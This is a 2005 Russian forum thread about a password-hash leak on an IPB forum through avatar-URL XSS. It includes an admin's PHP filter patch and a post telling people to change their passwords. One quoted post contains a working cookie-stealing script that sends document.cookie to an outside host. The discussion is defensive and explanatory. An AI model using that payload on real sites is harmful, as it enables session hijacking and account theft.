Смена паролей (официальное объявление)

Сообщение **t.t** » 31.05.2005 18:19

(Nick S. Grechukh @ Вторник, 31 Мая 2005, 17:14) писал(а):что будет если в хэш еще включать ip?
↑

Если включать -- наверное хорошо будет. Но в том хеше, который уже упёрли (точнее: могли упереть) его, как я понимаю, нет.

Nick S. Grechukh · Сообщение **Nick S. Grechukh** » 31.05.2005 18:23

(t.t @ Вторник, 31 Мая 2005, 17:19) писал(а):
(Nick S. Grechukh @ Вторник, 31 Мая 2005, 17:14) писал(а):что будет если в хэш еще включать ip?
↑
Если включать -- наверное хорошо будет. Но в том хеше, который уже упёрли (точнее: могли упереть) его, как я понимаю, нет.

↑

ну понятно. если *сейчас* сменить формат , то те хэши не помогут.
тогда пострадают только те у кого короткие пароли, причем одинаковые на всех сайтах.

Сообщение **valeri_ufo** » 31.05.2005 18:26

(Nick S. Grechukh @ Вторник, 31 Мая 2005, 16:23) писал(а):
(t.t @ Вторник, 31 Мая 2005, 17:19) писал(а):
(Nick S. Grechukh @ Вторник, 31 Мая 2005, 17:14) писал(а):что будет если в хэш еще включать ip?
↑
Если включать -- наверное хорошо будет. Но в том хеше, который уже упёрли (точнее: могли упереть) его, как я понимаю, нет.

↑

ну понятно. если *сейчас* сменить формат , то те хэши не помогут.
тогда пострадают только те у кого короткие пароли, причем одинаковые на всех сайтах.

↑

пострадают те кто их не сменил.

Сообщение **Xenon** » 31.05.2005 18:34

Хм. Давайте кто-нибудь попробует ЭТИМ методом сломать форум и посмотреть, получится ли ? Если получится, то точно нужно что-то делать, если нет, то нафиг заморачиваться ?

Nick S. Grechukh · Сообщение **Nick S. Grechukh** » 31.05.2005 18:37

(valeri_ufo @ Вторник, 31 Мая 2005, 17:26) писал(а):пострадают те кто их не сменил.

хэш УЖЕ украден, и теоретически по нему можно подобрать пароль.
теперь любителям single sign-on [

] надо менять пароли везед, не только на linuxforum.

bogus · Сообщение **bogus** » 31.05.2005 18:46

(Nick S. Grechukh @ Вторник, 31 Мая 2005, 17:14) писал(а):что будет если в хэш еще включать ip?

Повторюсь: насколько я вижу, IPB и так использует не в чистом виде пароль при получении хэша. Во всяком случае, кука по форме похожа на md5 от чего-то, а md5(<мой пароль>) не совпадает со значением из куки.

Надо бы посмотреть в исходниках...

Сообщение **zenwolf** » 31.05.2005 18:56

(Nick S. Grechukh @ Вторник, 31 Мая 2005, 14:37) писал(а):
(valeri_ufo @ Вторник, 31 Мая 2005, 17:26) писал(а):пострадают те кто их не сменил.

хэш УЖЕ украден, и теоретически по нему можно подобрать пароль.
теперь любителям single sign-on [ ] надо менять пароли везед, не только на linuxforum.

↑

даже не теоретически ,а очень даже практически ,уже было такое на bsdportal ,
ОЧЕНЬ РЕКОМЕНДУЮ СМЕНИТЬ ПАРОЛИ .

Sonic · Сообщение **Sonic** » 31.05.2005 19:25

(bogus @ Вторник, 31 Мая 2005, 15:15) писал(а):а как IPB формирует этот хэш? Что-то мне подсказывает, что он использует не чистый пароль, а с какой-то секретной добавкой...

↑

Естественно, только как не знаю. А меня пароль это не обезательно. Но если легче станет, то меняйте.

Ещё, я вроде ставил заплатку на загрузку аватарки. Регулярное выражение прописывали, но что-то видать не срослось

Сообщение **alv** » 31.05.2005 19:26

(wolf_black @ Вторник, 31 Мая 2005, 17:56) писал(а):ОЧЕНЬ РЕКОМЕНДУЮ СМЕНИТЬ ПАРОЛИ .

↑

Что не вредно и вообще - память потренировать, лучшее лекарство от раннего эклера

Sonic · Сообщение **Sonic** » 31.05.2005 19:36

Вот было:

Код: Выделить всё

//-----------------------------------------
// Check to make sure we don't just have
// http:// in the URL box..
//-----------------------------------------

if ( preg_match( "/^http://$/i", $ibforums->input['url_avatar'] ) )
{
$ibforums->input['url_avatar'] = "";
}

if ( empty($ibforums->input['url_avatar']) )

стало

Код: Выделить всё

//-----------------------------------------
// Check to make sure we don't just have
// http:// in the URL box..
//-----------------------------------------

if ( preg_match( "/^http://$/i", $ibforums->input['url_avatar'] ) )
{
$ibforums->input['url_avatar'] = "";
}

if ( preg_match( "#javascript:#is", $ibforums->input['url_avatar'] ) )
{
$ibforums->input['url_avatar'] = "";
}

if ( empty($ibforums->input['url_avatar']) )

Вот эта строка if ( preg_match( "#java script:#is", $ibforums->input['url_avatar'] ) ) должна выбивать скрипт, но чё-то не сработало

Sonic добавил в 31.05.2005 19:36

(Lindemidux @ Вторник, 31 Мая 2005, 13:20) писал(а):Содержимое Jpeg эксплойта:
"<script>img = new Image();
img.src = "http://flood3r.com/hack/sn_1/me.jpg?"+document.cookie;</script>"

↑

И как он его влепил?

boot · Сообщение **boot** » 31.05.2005 19:55

Сменил.

Я прививок не боюсь, если надо - уколюсь

Lindemidux · Сообщение **Lindemidux** » 01.06.2005 08:53

Месяц назад я качал с Flood3r.com видео: захват форума через автару.
Там его можно скачать.

Lindemidux добавил в 01.06.2005 08:53

Для ВСЕХ:
Зря Ахтунг подняли, Flood3r.com в послеаварийном состоянии. Там не работает сниффер

Сообщение **snake** » 01.06.2005 11:23

(Lindemidux @ Среда, 01 Июня 2005, 7:53) писал(а):Месяц назад я качал с Flood3r.com видео: захват форума через автару.
Там его можно скачать.

Lindemidux добавил в 01.06.2005 08:53

Для ВСЕХ:
Зря Ахтунг подняли, Flood3r.com в послеаварийном состоянии. Там не работает сниффер

↑

Лучше перестраховаться, чем питаться потом собственными локтями.

VN_MAClover · Сообщение **VN_MAClover** » 01.06.2005 13:23

(snake @ Среда, 01 Июня 2005, 10:23) писал(а):Лучше перестраховаться, чем питаться потом собственными локтями.

↑

Поддерживаю. Хотя в данном случае ничего сверхсекретного нет по определению, профилактика рулит, а, главное, вырабатывается правильный рефлекс поведения в данной ситуации.

FreeNUX · Сообщение **FreeNUX** » 04.06.2005 15:30

Сменил, мне не трудно

.

unixforum.org

Смена паролей (официальное объявление)

Re: Смена паролей

Re: Смена паролей

Re: Смена паролей

Re: Смена паролей

Re: Смена паролей

Re: Смена паролей

Re: Смена паролей

Re: Смена паролей

Re: Смена паролей

Re: Смена паролей

Re: Смена паролей

Re: Смена паролей

Re: Смена паролей

Re: Смена паролей

Re: Смена паролей